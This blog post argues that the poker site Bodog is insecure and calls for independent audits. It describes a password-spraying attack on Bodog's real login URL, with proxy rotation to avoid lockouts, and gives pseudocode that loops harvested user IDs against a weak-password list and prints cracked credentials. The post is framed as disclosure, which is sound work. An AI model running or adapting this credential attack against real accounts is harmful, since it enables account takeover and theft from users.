Yesterday we posted an article about how Bodog’s anonymous tables weren’t so anonymous after all. We accompanied this with a video showing how this was true:
Bodog’s response was to cover it up and not really address the root problem: The violation of server-client trust. They went on to say:
Your money is and has always been safe at Bodog. If you are concerned about the security of your account, having access to an account number is similar to having a screenname before our latest update.
In a future blog post we’ll talk about how the only secure method of user authentication is the Two-Factor Model, but that’s not the focus today.
As we like to say here at hhSmithy:
Bodog claims that showing the account IDs of a user is inherently safe, because a hacker would still need your password to log in. Forgetting for a second that this claim implicitly admits that they blatantly lied about having anonymous tables, they’re saying that their system is secure because an attack on the users’ passwords is impossible on Bodog.
Well, maybe it is and maybe it isn’t. According to Gus Fritchie and Mike Wright, Bodog’s software has numerous cross-site scripting (XSS) vulnerabilities and an exposed web API for logging in. (source: Getting F***** on the River, Defcon 19)
When we looked into these problems, many of them still existed. However, we’ll only talk about one method of attack on the web API, since it’s vulnerable to a brute force attempt.
On Bodog’s log-in form, they will lock someone out for multiple attempts on a given user ID with the incorrect password. The lockout period is a few minutes, which ensures someone can’t brute force a single username in a reasonable timeframe. However, the shotgun method works fine! Simply writing a script that gathers a bunch of usernames from a tool like PartyCrasher (not publicly available, please stop asking) and pairing this with a wordlist of passwords, you can try every user you’ve found with every password – ensuring you don’t hit the timeout for any given username!
Since they don’t ban on IP, no proxies are necessary – but implementing them isn’t hard, either. You can find free lists of proxies and purchase the rights to thousands of more IPs for less than $100/month, and you can cycle your brute force script through these proxies – perhaps limiting the attack to 200 attempts per proxy.
The video below details the attack with a voiceover explanation:
Here’s the pseudocode shown in the video that gives you a basic outline on how a hacker might start their script to bust various user passwords. Remember, Bodog only enforces a six character password without the need for mixed case, special characters, numbers, or anything exciting. I’ve made multiple accounts there with the password of “password” or “bodogpoker” with no problem. You can be sure that plenty of users have simple passwords, too.
// username and password global lists
username = array('4025500', '1240159', '8856161', ...)
password = array('password', 'bodogpoker', 'badbeats', ...)
// attempts a bodog login with a username and password
function attemptBodogLogin(user,pass)
failure = 'Required information' // failure string
response = webFormSubmit('https://www.bodog.eu/account/app/Login',
user, pass) // submit a form with user and password
if (response == failure)
return FALSE // nope, user and pass pair failed
else
return TRUE // hacked!
// tells you if the bodog login succeeds and prints account details
function hackUser(user, pass)
result = attemptBodogLogin(user, pass)
if (result == TRUE)
print 'Broken password! User: ' . user
print 'Password: ' . pass
// main function that is called first, nested for loop (O(n*m) for nerds)
function main()
foreach(password as pass) // for every password in the list
foreach(username as user) // for every username in the list
hackUser(user, pass) // try a user with the first pass
endforeach // next user, try the same password
endforeach // next password, loop through the userlist again
Bodog and other sites like it must subject themselves to independent analysis if they ever want to claim that they’re secure. There are numerous hackers out there doing exactly what we’re doing without disclosing anything. They’re stealing money left and right and using poor software code to write exploitative bots. The only poker site who even comes close to doing a good job is PokerStars, and it’s not even clear that some attacks won’t work there.
The need for independent analysis has never been greater with the possibility of legalization of online poker. It comes hand in hand with regulation. Demand it.
Good stuff, I did some research and presented at Defcon and HackrCon II (http://www.senet-int.com/news1.php) and covered some of these same types of issues including the ease that passwords could be broken. In July Bodog did not perform account lockout, nice to see that are at least doing that now. I was just about to look at Bodog’s anonymous tables as I did not think they would have implemented it correctly, but you beat me to it:) I also have written some articles for Pokerfuse on information security and regulation and think that we are on the same page with the direction the industry needs to move. Feel free to contact me directly if you want to have any future conversation on the subject.
Gus
Gus:
Great to hear from you. We used you as a source in this article, and your talk was outstanding (I’ve suggested it to many people on 2p2).
I’ll be in touch soon; I’d love to pick your brain about a few other exploits.